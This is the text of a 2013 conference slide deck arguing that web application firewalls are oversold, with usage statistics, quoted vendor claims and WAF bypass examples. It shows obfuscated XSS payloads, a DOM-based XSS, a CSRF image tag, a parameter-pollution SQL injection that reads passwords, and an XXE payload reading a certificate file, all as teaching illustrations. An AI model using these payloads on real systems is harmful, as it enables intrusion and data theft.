«We protect your website» – No you don`t

“We protect you applications”!
“No, you don’t”

Digicomp Hacking Day 2013
May 16th 2013

Sven Vetsch
§  Partner & CTO at Redguard AG
§  www.redguard.ch
§  Specialized in Application Security
§  (Web, Web-Services, Mobile, …)
§  Leader OWASP Switzerland
§  www.owasp.org / www.owasp.ch

sven.vetsch@redguard.ch

Twitter: @disenchant_ch / @redguard_ch

Disclaimer
This presentation is focused on classic WAF
functionality so we won’t get into Single-Sign-
On, Content Injection and so on.

All the views in this presentation are my own
and not necessarily those of Redguard AG.

Outline
WAF
in

numbers

What
do

vendors
tell

you

Bypassing

techniques

>80%
of organizations were attacked
successfully at least once in 2011
Perceptions About Network Security - Ponemon Institute© Research Report, 2011

23%

already experienced a data or
system breach as a result of an
application layer vulnerability
WhiteHat Security – Website Security Statistics Report May 2013

… only 29% in banking
55.6%
of all organizations use WAFs

WAF Deployment by Industry
29
30
17
30
32
30
50
20
12
10
10
8
43
30
17
30
36
29
17
10
12
Banking
Financial Services
Healthcare
Retail
Technology
Monitoring and actively blocking attacks
Currently only monitoring trafﬁc
Installing and/or conﬁguration mode
No WAF deployed
Don't know

WAF usage after a breach
38%
19%
6%
6%
31%
Monitoring and actively blocking attacks
Currently only monitoring trafﬁc
Installing and/or conﬁguration mode
Don't know
No WAF deployed

62%
of attacks can be blocked
by a WAF with default rule sets
NT OBJECTives - Analyzing the Effectiveness of Web Application Firewalls 2011

Organizations with a
Web Application Firewall
deployed had
11% more vulnerabilities,
resolved them 8% slower,
and had a
7% lower remediation rate.

§  Possible reasons:
§  Insufﬁcient global security processes
§  Rules are not sufﬁcient
§  Not enough resources to manage the WAF
§  WAFs are threated as if they could solve all
problem
§  WAFs are only in monitoring mode instead of
blocking anything
§  …

A WAF is a tool,
not a solution

Don’t worry, there are also good news

By summing all these percentages up
we could safely say that a WAF could
feasible help mitigate the risk of at
least
71%
of all custom web application
vulnerabilities

12 May 2013
Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch
21
Vendor Supplied Certiﬁcate

“[Product] guarantees security of web
applications.”

12 May 2013
22

“The [Company] Web Application Firewall
quickly protects web servers from data
breaches and websites from defacement
without administrators waiting for clean code
or even knowing how an application works.”

12 May 2013
23

“Fully addresses PCI 6.6”

15 May 2013
24

“Fully addresses PCI 6.6”

Data Security Standard v2

6.6 For public-facing web applications, address new threats and
vulnerabilities on an ongoing basis and ensure these applications are
protected against known attacks by either of the following methods:

•  Reviewing public-facing web applications via manual or automated
application vulnerability security assessment tools or methods, at
least annually and after any changes

•  Installing a web-application ﬁrewall in front of public-facing web
applications

12 May 2013
25

“Because of its unique blend of HTML and XML
security, the [Company] Web Application Firewall
provides a full compliance solution for the PCI
DSS sections 6.5 and 6.6, which mandate the
implementation of a Web application ﬁrewall by
June 30, 2008.”

15 May 2013
26

“Because of its unique blend of HTML and XML
security, the [Company] Web Application Firewall
provides a full compliance solution for the PCI
DSS sections 6.5 and 6.6, which mandate the
implementation of a Web application ﬁrewall by
June 30, 2008.”

Data Security Standard v2

6.5 Develop applications based on secure coding guidelines. Prevent
common coding vulnerabilities in software development processes, to
include the following: [OWASP Top 10]

15 May 2013
27

The [Product] offers you the following
technical features:
•  ...
•  Session ﬁxation
•  …

12 May 2013
28

The [Product] offers you the following
technical features:
•  ...
•  Session ﬁxation
•  …

Insecure Rules
§  Let’s take the following pseudo rule:
if ($path == "/admin") {
if ($ipaddr == $internal_ipaddr)
[block request]
else
[allow request]
}

Insecure Rules
WAF
/admin
192.168.1.42

203.0.113.23

Insecure Rules
WAF
/../admin
192.168.1.42

203.0.113.23

Insecure Rules
"/admin" == "/admin"
-> true
"/../admin" == "/admin"
-> false

XSS – Obfuscation
§  When non-security people talk about XSS
<script>alert("XSS");</script>

XSS – Obfuscation
§  When security people talk about XSS
<script>alert(String.fromCharCode(88,
83,83));</script>
<IMG
SRC=javasc
ript:a&#1
08;ert('X&
#83;S')>

XSS – Obfuscation
§  When appsec people talk about XSS
<script>
window[(+{}+[])[-~[]]+(![]+[])[-~-
~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])
[-~[]]+(!![]+[])[+[]]](("XSS"))
</script>

XSS – Obfuscation
§  When appsec people talk about XSS
<script>
[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]
+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+
[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+
[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+
[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]
+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([]
[[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+
[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]
((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])
[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+
([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!!
[]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+
[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])
[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+
{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])
[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+…
</script>
Try it yourself: http://patriciopalladino.com/ﬁles/hieroglyphy/

DOM-based XSS
<!DOCTYPE html>
<html>
<body>
Hello <span id="name"></span>
<script>
document.getElementById("name").innerHTML =
document.location.hash.slice(1);
</script>
</body>
</html>

DOM-based XSS
http://www.example.com/#John
http://www.example.com/#<h1>John</h1>

DOM-based XSS
http://www.example.com/#<img src="x"
onerror="alert(1)"/>

A XSS attack like the one showed
neverhits the server
… so screw your WAF

Cross-Site Request Forgery (CSRF)
http://www.evil.com
http://www.nice.com
1
3
2
<img
src=“http://
www.nice.com
/buy?
article=123” />

Without understanding the
application or modifying the HTTP
response, a WAF
can’t protect
against CSRF
attacks.

… my experience would
be more around 50%
11.2%
of all application are vulnerable
to CSRF attacks

HTTP Parameter Pollution (HPP)
http://www.google.com/?
q=<script>&q=alert("XSS")&q=</script>

http://www.example.com/?id=1&id=2
Technology
Behavior
Result

ASP
/
ASP.NET
ConcatenaJon
id=1,2

PHP
Last
occurrence
id=2

Java
First
occurrence
id=1

§  Let’s have a look at the following simple
pseudo rule against SQL Injection attacks:
if $param_id.match(/.*select.*from.*/)
[block request]

http://www.example.com/page.aspx?id=123
http://www.example.com/page.aspx?
id=123;select%201,password%20from%20
users;%20--
id=123;&id=select%201&id=password%20from
%20users;%20--

id=123;&id=select%201&id=password%20from
%20users;%20--
§  id = 123;
§  id = select 1
§  id = password from users; --
-> 123; select 1,password from users; --

WAF rules are
not
platform independent

More things your WAF isn’t good at
§  Anti-Automation and process validation
§  Understanding application logic
§  Insufﬁcient Authentication & Authorization
§  Brute Force Attacks
§  Session Fixation
§  Anomaly Detection
§  Improper Filesystem Permissions
§  Securing client side running code
§  …

Hacking a WAF (for fun and proﬁt)
§  In the past, WAFs also suffered from
vulnerabilities like:
§  Filter Bypasses (a lot of them!!!)
§  XSS in their web admin interface
§  CSRF in their web admin interface
§  Default SSH root passwords
§  Information Disclosure about the LAN/DMZ
§  Arbitrary remote command execution
§  XML External Entity (XXE) Attacks


Example scenario based on ModSecurity
XML External Entity (XXE) vulnerability
CVE-2013-1915

WAF

/etc/apache2/ssl/cert.pem
WAF

Request:

Response:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/apache2/ssl/cert.pem"
>]><foo>&xxe;</foo>

Conclusion
WAFs …
§  are good – at least they can help you
§  must be tuned by a trained professional
§  can’t compensate insecure code
§  aren’t an alternative to patching vulnerabilities
§  can generate a lot of proﬁt for vendors so be
careful about what features you really need
and how well they perform
§  don’t solve all your appsec problems

We should accept WAFs for what
they really are: a method of
increasing the cost of attacks, but
not necessarily one that might
repel every attacker.
Ivan Ristic

Q & A
sven.vetsch@redguard.ch

@disenchant_ch / @redguard_ch

«We protect your website» – No you don`t

Recommended

Recommended

More Related Content

What's hot

What's hot (7)

Viewers also liked

Viewers also liked (8)

Similar to «We protect your website» – No you don`t

Similar to «We protect your website» – No you don`t (20)

More from Digicomp Academy AG

More from Digicomp Academy AG (20)

Recently uploaded

Recently uploaded (20)

«We protect your website» – No you don`t